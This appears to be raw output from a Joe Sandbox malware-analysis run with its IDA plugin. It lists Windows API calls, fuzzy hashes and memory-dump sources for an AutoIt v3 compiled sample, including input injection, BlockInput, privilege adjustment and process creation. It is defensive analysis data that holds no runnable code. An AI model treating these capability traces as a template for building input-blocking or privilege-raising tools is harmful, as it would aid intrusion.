                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1273190321-0
                                                                                                                                                          • Opcode ID: c900b2847c1dc52bb4bf3b3eee2491bb2ca1f338447769f26f2260b0793a2f4b
                                                                                                                                                          • Instruction ID: f884542c2e955aa56d1ab8459e01a0e37117473745e0c23bb7c977246d87eb40
                                                                                                                                                          • Opcode Fuzzy Hash: c900b2847c1dc52bb4bf3b3eee2491bb2ca1f338447769f26f2260b0793a2f4b
                                                                                                                                                          • Instruction Fuzzy Hash: 2E01B131300604EBCB25AF14EC89F6A7FAAFF86364F140128F9564B6E1C7319952DF50
                                                                                                                                                          APIs
                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 0018F47D
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0019F42E,?,?,?,?,?), ref: 0018F4A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3420055661-0
                                                                                                                                                          • Opcode ID: 3694761890306c90936a6a2e5139da3c76ed24c24960b9235656bc25e3b2ee8b
                                                                                                                                                          • Instruction ID: 6fc025cd13b44ad58782c1bdf69130d1a62c458b18ae24e6759c57b516fc133c
                                                                                                                                                          • Opcode Fuzzy Hash: 3694761890306c90936a6a2e5139da3c76ed24c24960b9235656bc25e3b2ee8b
                                                                                                                                                          • Instruction Fuzzy Hash: A1F03A72410118FFEF049F95EC099BE7FB8FF49351F14401AF902A2560D3B5AA91EB60
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0017C2E2,?,?,00000000,?), ref: 0016D73F
                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0017C2E2,?,?,00000000,?), ref: 0016D751
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                          • Opcode ID: 831f78d45d1da18324914281cde2d7e2a6025d21c07274eb5f6632e252a5afd7
                                                                                                                                                          • Instruction ID: dfb5c9402865f3295e8f57cc31d2921b9f8e7f307cf0fe5cdfb33004db9b894d
                                                                                                                                                          • Opcode Fuzzy Hash: 831f78d45d1da18324914281cde2d7e2a6025d21c07274eb5f6632e252a5afd7
                                                                                                                                                          • Instruction Fuzzy Hash: 2CF08C3550132DABDB21AFA4EC49FEA776CBF4A361F008125B91AD6181D7709A80CBA1
                                                                                                                                                          APIs
                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00164B89
                                                                                                                                                          • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00164B9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InputSendkeybd_event
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3536248340-0
                                                                                                                                                          • Opcode ID: 890fa876c7850e46db157eef758283a534b05730f4994c8a197528224f3d9417
                                                                                                                                                          • Instruction ID: 482f2f0d6847f74c7c07e0f57a07eaa86d6494351a99e4d49f92c22becd714b6
                                                                                                                                                          • Opcode Fuzzy Hash: 890fa876c7850e46db157eef758283a534b05730f4994c8a197528224f3d9417
                                                                                                                                                          • Instruction Fuzzy Hash: FDF0677080024EAFEB058FA1C805BBE7BB4EF01305F04840AF962A6291D379C6169FA0
                                                                                                                                                          APIs
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0015B8C5
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0015B8D7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                          • Opcode ID: 06fe32bfbe063d7ec0fc3e1032ab7987aaaee44d30decab736ebf6cd1236e802
                                                                                                                                                          • Instruction ID: c1c7b68adc07ce07a3208bbe0bc7ffb07374b8aa8a21bfe38384c26a4ba162e6
                                                                                                                                                          • Opcode Fuzzy Hash: 06fe32bfbe063d7ec0fc3e1032ab7987aaaee44d30decab736ebf6cd1236e802
                                                                                                                                                          • Instruction Fuzzy Hash: 05E0E671004511EFE7262B51FC45D77B7EDEF093117108459F55685870DB719CD1DB10
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0018F59C
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0019F3AD,?,?,?,?), ref: 0018F5C6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          APIs
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0012125D,00147A43,00120F35,?,?,00000001), ref: 00148E41
                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00148E4A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00190352
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0018E7AF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CallLongProc
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084987330-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B736: GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                            • Part of subcall function 0013B736: ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0019F417,?,?,?,?,?,00000001,?), ref: 0018EA9C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2356834413-0
                                                                                                                                                          • Opcode ID: 468929288f9a5f2ab3daf16923d9339df08e03ed9bde465454c1e690f2b21e56
                                                                                                                                                          • Instruction ID: 04e6b3ec9d31c90ea6f63c001b5eb6d4dd350bc38541003d4a051aabf9414ead
                                                                                                                                                          • Opcode Fuzzy Hash: 468929288f9a5f2ab3daf16923d9339df08e03ed9bde465454c1e690f2b21e56
                                                                                                                                                          • Instruction Fuzzy Hash: 6AF08C35200229BBDB18AF19DC4AEBE3FA5FB00B90F044015F91A6B1A1D77699A1DBD1
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0013AF40,?,?,?,?,?), ref: 0013B83B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 5a940675029ac2d0117c4ebc24bd4efc6a39053e5549ff893ea3324fc5956bb1
                                                                                                                                                          • Instruction ID: c23ee07db3d8e2182647c0855fdcbd04f1e6e1c8b185786f1339cfb7811b6cca
                                                                                                                                                          • Opcode Fuzzy Hash: 5a940675029ac2d0117c4ebc24bd4efc6a39053e5549ff893ea3324fc5956bb1
                                                                                                                                                          • Instruction Fuzzy Hash: F1F05E30600249AFDF189F54D890D3D3BA6FB05360F144229F9528B6B1D771D8A0DB50
                                                                                                                                                          APIs
                                                                                                                                                          • BlockInput.USER32(00000001), ref: 00177057
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                          • Opcode ID: e3099408eb11b5251391a7b7ba6871ad602cecb3bb292d6c910c3b245cb1cb02
                                                                                                                                                          • Instruction ID: a572c3924940dd2f08742b0070e85a6abb5f43be27cf7cad392302c568cc3e5e
                                                                                                                                                          • Opcode Fuzzy Hash: e3099408eb11b5251391a7b7ba6871ad602cecb3bb292d6c910c3b245cb1cb02
                                                                                                                                                          • Instruction Fuzzy Hash: 31E048363042145FC710EFA9D408D96F7EC9F65750F11C426FA49D7291DBB0E9408B90
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0018F41A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogNtdllProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3239928679-0
                                                                                                                                                          • Opcode ID: e55ebaf742bfdf7b0506cd03aa3f9a45c8fe862e1b2de26d2f90c423fd104be1
                                                                                                                                                          • Instruction ID: d4156eabb8cec88c6c668a82edf602dd2cdcdc159317fb15a8a6cb94686e55b2
                                                                                                                                                          • Opcode Fuzzy Hash: e55ebaf742bfdf7b0506cd03aa3f9a45c8fe862e1b2de26d2f90c423fd104be1
                                                                                                                                                          • Instruction Fuzzy Hash: A0F09231200689BFDB21EF58DC45FCA3BA5FB06360F044419FA11672E1CB707920DB64
                                                                                                                                                          APIs
                                                                                                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00167DF8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: mouse_event
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2434400541-0
                                                                                                                                                          • Opcode ID: e3aa2f4d0a41896cb291cd02aeb37d0de33399774129f40fc510dcf158e37be3
                                                                                                                                                          • Instruction ID: 48003de7833e1147cf1f3613f4e7a334b729f866ea8320c7f7df37eab622a6b7
                                                                                                                                                          • Opcode Fuzzy Hash: e3aa2f4d0a41896cb291cd02aeb37d0de33399774129f40fc510dcf158e37be3
                                                                                                                                                          • Instruction Fuzzy Hash: 11D0A7A017C60679FD1C07A4AC2FF3B0218EB017C9FA14E49B102C60C1EFD46C605034
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0013ACC7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 28b9fe2255974388baea7c1c91ce830b9a499b6a7bb5e1212db2c9d7faea8e66
                                                                                                                                                          • Instruction ID: 5f03a9ff25ba3e2fc9f006699a25e5ec6c93ed6fe97e60bf6e557908eb2e4eee
                                                                                                                                                          • Opcode Fuzzy Hash: 28b9fe2255974388baea7c1c91ce830b9a499b6a7bb5e1212db2c9d7faea8e66
                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0EC35600208FBCF05AF90DC51E6C3B6AFF59394F508418F6465A6A1CB33A562EB51
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0019F3D4,?,?,?,?,?,?), ref: 0018F450
                                                                                                                                                            • Part of subcall function 0018E13E: _memset.LIBCMT ref: 0018E14D
                                                                                                                                                            • Part of subcall function 0018E13E: _memset.LIBCMT ref: 0018E15C
                                                                                                                                                            • Part of subcall function 0018E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001E3EE0,001E3F24), ref: 0018E18B
                                                                                                                                                            • Part of subcall function 0018E13E: CloseHandle.KERNEL32 ref: 0018E19D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                           • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                           • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2364484715-0
                                                                                                                                                          • Opcode ID: 7c05057d5efe0a87e98dcd6a266b0dd4c4361e3af134e303c30e7c4b578bd1e9
                                                                                                                                                          • Instruction ID: 895e2401c650c99e3e77c393cb6ac1f3b268ca397d9bb804c7405c407a9fd4ca
                                                                                                                                                          • Opcode Fuzzy Hash: 7c05057d5efe0a87e98dcd6a266b0dd4c4361e3af134e303c30e7c4b578bd1e9
                                                                                                                                                          • Instruction Fuzzy Hash: D8E0B631110209EFCB11EF58EC49E9A37B6FB19350F058055FA055B6B1D731AA61EF51
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL ref: 0018F3A1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogNtdllProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3239928679-0
                                                                                                                                                          • Opcode ID: d68fb0445723d5803220f5ec226e079689b868ef47dfe62084c17169bf961de9
                                                                                                                                                          • Instruction ID: 7427dcbe7d3b0ce1633cc0f29fd95d5de7dd0e8daf967413515d542b87539193
                                                                                                                                                          • Opcode Fuzzy Hash: d68fb0445723d5803220f5ec226e079689b868ef47dfe62084c17169bf961de9
                                                                                                                                                          • Instruction Fuzzy Hash: 13E0173420424CEFCB01DF88EC84E8A3BA5FB1A350F040054FD058B761C771A870DB61
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL ref: 0018F3D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogNtdllProc_
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3239928679-0
                                                                                                                                                          • Opcode ID: e4207a6494bf41c7c89fd4a4805ac56f4a1e9b6335937573943d26fc9f71233e
                                                                                                                                                          • Instruction ID: 61d8b86395b1609fad7a7bcd074d30f1e11687efef83c7e45efe6cb4366cac7d
                                                                                                                                                          • Opcode Fuzzy Hash: e4207a6494bf41c7c89fd4a4805ac56f4a1e9b6335937573943d26fc9f71233e
                                                                                                                                                          • Instruction Fuzzy Hash: 7BE0173420024CEFCB01DF88E884E8A3BA5FB1A350F040054FD058B762C772A870EBA1
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013B85B), ref: 0013B926
                                                                                                                                                            • Part of subcall function 0013B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0013B85B,00000000,?,?,0013AF1E,?,?), ref: 0013B9BD
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0013AF1E,?,?), ref: 0013B864
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2797419724-0
                                                                                                                                                          • Opcode ID: 5b298abdffe580edd4c6e4e67792fd6f79057ca494aa0801dfd667cdf98a2885
                                                                                                                                                          • Instruction ID: f92db910c8e25d636210131dcdbe1df5552a1bc468edfd804d6576ffdfa79275
                                                                                                                                                          • Opcode Fuzzy Hash: 5b298abdffe580edd4c6e4e67792fd6f79057ca494aa0801dfd667cdf98a2885
                                                                                                                                                          • Instruction Fuzzy Hash: 65D0127124430C77DB102B61EC07F4D3E5DAF11790F408420F705695E19B7264509555
                                                                                                                                                          APIs
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00148E1F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                          • Opcode ID: 1e980d1e0057729ad1848207434c84d0c3c54d254eef44000a467f9495baaab4
                                                                                                                                                          • Instruction ID: 685d18fef1f97dc3933395e16b9c787fbb20a64b45d1cea616c4e4551806bdaf
                                                                                                                                                          • Opcode Fuzzy Hash: 1e980d1e0057729ad1848207434c84d0c3c54d254eef44000a467f9495baaab4
                                                                                                                                                          • Instruction Fuzzy Hash: 63A0127000090CA78E001B51FC044447F5CEB051507004010F40D00821873354504581
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00146AE9,001D67D8,00000014), ref: 0014A937
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 54951025-0
Memory Dump Source
• Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
• Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          APIs
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0017A7A5
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0017A7B7
                                                                                                                                                          • DestroyWindow.USER32 ref: 0017A7C5
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0017A7DF
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0017A7E6
                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0017A927
                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0017A937
                                                                                                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A97F
                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0017A98B
                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0017A9C5
                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A9FA
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AA05
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0017AA0E
                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AA1D
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0017AA26
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AA2D
                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0017AA38
                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0017AA4A
                                                                                                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001AD9BC,00000000), ref: 0017AA60
                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0017AA70
                                                                                                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0017AA96
                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0017AAB5
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017AAD7
                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017ACC4
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Global$Rect$Create$DeleteFileFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                          APIs
                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0018D0EB
